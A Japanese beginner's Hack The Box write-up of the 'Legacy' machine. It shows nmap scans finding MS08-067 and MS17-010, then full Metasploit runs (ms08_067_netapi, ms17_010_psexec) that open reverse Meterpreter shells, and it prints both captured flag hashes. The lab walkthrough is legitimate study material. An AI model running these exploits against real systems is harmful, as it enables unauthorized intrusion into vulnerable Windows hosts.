自己紹介
Hack the box ど素人
ハッキングラボを終えて試す場としておすすめだということで始めました。
自分用のメモではありますが、間違いや改善点などご指摘いただいたけたら幸いです。
マシン
今回のマシンはLegacy、
@v_avengerさんのDEF CON 28:Red Team Village:敵対者を蹴散らすゲリラレッドチームの構築を参考に進めようと思い、このマシンを選びました。
nmap
まずはnmapで開いているポートを調べる。
root@kali:~# nmap -A -Pn 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 03:55 JST
Nmap scan report for 10.10.10.4
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h31m37s, deviation: 2h07m16s, median: 4d23h01m37s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:14:10 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-09-06T23:57:46+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 250.81 ms 10.10.14.1
2 251.14 ms 10.10.10.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.10 seconds
見覚えのあるポート番号の139と445が出てきた。
sambaのものでおそらくmetasploitでやるのであろうと推測を立ててみた。
脆弱性を調べてみた。
root@kali:~# nmap -Pn -script smb-vuln* -p 139 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 04:10 JST
Nmap scan report for 10.10.10.4
Host is up (0.25s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 8.83 seconds
VULNERABLE
が表示され、ms08-067とms17-010という脆弱性があることがわかった。
ポート番号を変えると変化があるか興味を持ったが139と445とでは特に変化が見られなかった。
#ms08-067
root@kali:~# searchsploit ms08-067
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067) | windows/remote/40279.py
Microsoft Windows Server - Code Execution (MS08-067) | windows/remote/7104.c
Microsoft Windows Server - Code Execution (PoC) (MS08-067) | windows/dos/6824.txt
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit) | windows/remote/16362.rb
Microsoft Windows Server - Universal Code Execution (MS08-067) | windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067) | windows/remote/7132.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
searchsploitでmetasploitが使えることが分かった。
msf5 > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf5 > use 0
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.9:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] Meterpreter session 2 opened (10.10.14.9:4444 -> 10.10.10.4:1033) at 2020-09-02 04:42:00 +0900
うまくシェルが返ってきた。
#ms17-010
前も違うマシンでやった気がするがせっかくなのでこちらでもやってみる。
root@kali:~# searchsploit ms17-010
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
こちらの脆弱性もmetasploitが使えるようなので使っていく。
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
msf5 > use 4
msf5 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.13:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x81e5c1d0
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... EoQoquDI.exe
[*] 10.10.10.4:445 - Created \EoQoquDI.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \EoQoquDI.exe...
[*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.4:1031) at 2020-08-03 20:44:35 +0900
こちらもうまくシェルが返ってきた。
user
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd /
meterpreter > dir
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil 2017-03-16 14:30:44 +0900 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-03-16 14:30:44 +0900 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:29 +0900 Documents and Settings
100444/r--r--r-- 0 fil 2017-03-16 14:30:44 +0900 IO.SYS
100444/r--r--r-- 0 fil 2017-03-16 14:30:44 +0900 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-14 05:13:04 +0900 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2017-03-16 14:20:57 +0900 Program Files
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:30 +0900 System Volume Information
40777/rwxrwxrwx 0 dir 2017-03-16 14:18:34 +0900 WINDOWS
100666/rw-rw-rw- 211 fil 2017-03-16 14:20:02 +0900 boot.ini
100444/r--r--r-- 250048 fil 2008-04-14 07:01:44 +0900 ntldr
60401544/r-xr--r-- 48691528838709231 fif 1551977431-11-16 12:18:24 +0900 pagefile.sys
meterpreter > cd Documents\ and\ Settings
meterpreter > dir
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:29 +0900 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:29 +0900 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 14:32:52 +0900 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 14:32:42 +0900 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 john
meterpreter > cd john
meterpreter > dir
Listing: C:\Documents and Settings\john
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 My Documents
100666/rw-rw-rw- 524288 fil 2017-03-16 14:33:41 +0900 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-03-16 14:33:41 +0900 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 14:33:41 +0900 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 14:33:42 +0900 ntuser.ini
meterpreter > cd Desktop
meterpreter > dir
Listing: C:\Documents and Settings\john\Desktop
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 15:19:32 +0900 user.txt
meterpreter > cat user.txt
e69af0e4f443de7e36876fda4ec7644f
root
meterpreter > dir
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:29 +0900 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 14:20:29 +0900 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 14:32:52 +0900 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 14:32:42 +0900 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 14:33:41 +0900 john
meterpreter > cd Administrator
meterpreter > dir
Listing: C:\Documents and Settings\Administrator
================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 My Documents
100666/rw-rw-rw- 786432 fil 2017-03-16 15:07:20 +0900 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-03-16 15:07:20 +0900 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 15:07:20 +0900 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 15:07:20 +0900 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 15:07:21 +0900 ntuser.ini
meterpreter > cd Desktop
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-03-16 15:18:19 +0900 root.txt
meterpreter > cat root.txt
993442d258b0e0ec917cae9e695d5713
#疑問
・ms17-010のところでMetasploitでsearchした後どれを使えばいいかわからなくて戸惑った。
どうやって見分けるのだろう。
Exploit DBで調べたところmetasploit 4番のものだけが書いてあった。
モジュールのタイプ
感想
今回は3個目のマシンだった。
自分で言うことじゃないがポート番号を見て察するようになったのが1つ成長と思った。
ただLameとBlueをやっていたから今回は攻略できたが、違うようなマシンだと苦しめられるのだろうなと思った。
なんとか頑張りたい。
反省点としてシェルをとった後、権限を確認しなかったこと、Exploit DBを見なかったことがよくなかったと感じた。
拙い記事を最後まで読んでいただきありがとうございました。